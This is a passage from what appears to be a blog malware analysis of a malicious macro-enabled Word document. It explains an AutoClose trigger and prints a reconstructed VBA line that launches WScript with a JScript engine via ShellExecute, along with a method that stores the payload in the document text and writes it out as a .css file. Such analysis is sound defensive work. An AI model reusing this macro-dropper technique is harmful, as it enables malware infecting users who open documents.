This is the first in a three-part series of analysis on this malicious document.
Part 1: An analysis of the extracted macros.
Part 2: An analysis of the locked document.
I extracted the macros using OfficeMalScanner. It dumped two files, NewMacros and ThisDocument. We can see that ThisDocument contains Sub AutoClose(). This means that the macro will run when you close the document.
The sub named Tokio is located in NewMacros. It pulls from other variables in that same file.
A little bit of searching, copying, and pasting in that file allows us to piece together line 28.
VBA.CallByName VBA.CreateObject(Shell.Application), ShellExecute, VbMethod, WScript, /e:JScript "glob", "open", 1
Line 40 grabs the name of the current document and replaces .docm with .css. Line 48 creates the new document. Notice how it grabs the data from ActiveDocument.Content.Text. This data is stored in the pages of the .docm file itself. If you were to open the document, you would see this: